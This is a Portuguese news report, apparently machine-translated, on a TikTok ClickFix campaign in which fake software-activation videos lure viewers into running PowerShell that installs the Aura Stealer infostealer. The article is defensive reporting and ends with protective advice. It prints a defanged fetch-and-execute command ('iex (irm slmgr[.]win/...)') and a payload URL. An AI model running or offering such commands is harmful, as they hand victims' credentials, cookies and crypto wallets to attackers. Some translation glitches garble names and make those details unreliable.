Os cibercriminosos estão distribuindo malware para roubo de informações no TikTok usando vídeos disfarçados de guias de ativação de software gratuito. De acordo com BipandoComputadoro manipulador do ISC Xavier Mertens identificou a campanha em andamento, que emprega um método de engenharia social conhecido como ataque ClickFix para infectar sistemas de computador. Os vídeos, observados por BipandoComputadorafirmam fornecer instruções para ativar software legítimo, como Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro e Discord Nitro. A campanha também promove serviços fictícios, incluindo “Netflix Premium” e “Spotify Premium”. Mertens observou que esta atividade é basicamente igual a uma campanha observada anteriormente pela empresa de segurança Trend Micro em maio. Os vídeos usam uma técnica de engenharia social que apresenta uma solução aparentemente válida ou um conjunto de instruções para enganar os usuários e fazê-los comprometer suas próprias máquinas. Este ataque ClickFix engana os usuários para que executem comandos maliciosos do PowerShell. Cada vídeo exibe um comando de uma linha, como `iex (irm slmgr[.]win/photoshop)` e instrui os visualizadores a executá-lo com privilégios de administrador. O nome do programa na URL é modificado para corresponder ao software que está sendo representado; um guia falso do Windows usaria um URL contendo “windows” em vez de “photoshop”. Quando o comando é executado, o PowerShell se conecta ao site remoto `slmgr[.]win` para recuperar e executar outro script do PowerShell. Este script baixa dois executáveis das páginas da Cloudflare. O primeiro, de `https://file-epq[.]páginas[.]dev/updater.exe`, é uma variante do malware Aura Stealer. Este infostealer foi projetado para coletar credenciais de navegador salvas, cookies de autenticação, dados de carteira de criptomoeda e outras credenciais de aplicativos. Os dados roubados são então enviados aos invasores, concedendo-lhes acesso às contas da vítima. Uma segunda carga útil, `source.exe`, também é baixada como parte do ataque. De acordo com Mertens, este executável auto-compila o código usando o Visual C# Compiler integrado do .NET (`csc.exe`). O código resultante é posteriormente injetado e lançado diretamente na memória. O propósito específico desta carga adicional permanece obscuro. Os usuários que executaram essas etapas devem considerar todas as suas credenciais comprometidas. A ação recomendada é redefinir imediatamente as senhas de todos os sites e serviços que eles usam para evitar acesso não autorizado à conta e posterior roubo de dados. Os ataques ClickFix se tornaram populares no ano passado e são usados para distribuir vários tipos de malware em campanhas de ransomware e roubo de criptomoedas. Como regra geral, os usuários nunca devem copiar texto de um site e executá-lo em uma caixa de diálogo do sistema operacional. Este comunicado inclui a barra de endereços do File Explorer, o prompt de comando, os prompts do PowerShell, o terminal macOS e os shells do Linux.
